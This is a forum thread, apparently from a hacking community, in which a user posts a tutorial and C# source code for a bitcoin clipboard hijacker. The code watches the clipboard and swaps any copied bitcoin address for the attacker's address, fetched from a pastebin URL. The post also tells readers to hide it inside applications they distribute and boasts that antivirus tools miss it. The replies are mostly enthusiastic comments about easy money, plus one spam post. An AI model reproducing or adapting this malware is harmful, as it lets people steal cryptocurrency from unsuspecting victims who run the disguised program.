BataBo 13 Ok so how does this work? User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below) [hide]So lets start with the tutorial 1.Make paste bin account and make a paste in the paste you should write your bitcoin address You need to make account in case you change your btc address you can just edit paste without editing source code 2.Get raw form of your paste and save it somewhere 3.Use this code in your application: using System; using System.Net; using System.Threading; using System.Windows.Forms; ... private static readonly WebClient client = new WebClient(); ... Thread thread1 = new Thread(BitcoinStealer); thread1.SetApartmentState(ApartmentState.STA); thread1.Start(); ... static void BitcoinStealer() { string b = string.Empty; for (; ; ) { try { string text = Clipboard.GetText(); Console.WriteLine(text); if (text.Length >= 26 && text.Length <= 35 && (text.StartsWith("1") || text.StartsWith("3") || text.StartsWith("bc1")) && text != b) { Clipboard.SetText(client.DownloadString("https://pastebin.com/raw/")); } b = text; Thread.Sleep(150); } catch (Exception) { } } } 4.Replace copy your paste in Clipboard.SetText(client.DownloadString("https://pastebin.com/raw/")); 5.Distribute your application So what this pretty much does is when user copies his btc address program detects it and replaces it with address you specified This is completely undetectable as you can see here: https://www.virustotal.com/gui/file/2d4362d168e6b11b65fa039bdba906e9650a3eec29fe752f03c9330cd79dafcb/details And if you are a popular guy you can make quite a lot with this method [/hide] Quote Share this post Link to post Share on other sites
gsansanwal 0 thanks awesome crack lets go for ez money Quote Share this post Link to post Share on other sites
jiban7205 0 A purple pig and a green donkey flew a kite in the middle of the night and ended up sunburnt. I want more detailed information. Is it free? Malls are great places to shop; I can find everything I need under one roof. Don't step on the broken glass. Quote Share this post Link to post Share on other sites
ReaperGaming2018 0 EZ MUNS :fiesta: :fiesta: :fiesta: Quote Share this post Link to post Share on other sites
NuGzStILLOG 0 Ok so how does this work? User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below) mans cant wait to try this right quick :fiesta: :ezy: Quote Share this post Link to post Share on other sites
Baptiste44290 0 Et bien moi je trouve que c’est bof Quote Share this post Link to post Share on other sites
Anxious 12 Ok so how does this work? User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below) seems cool lets see Quote Share this post Link to post Share on other sites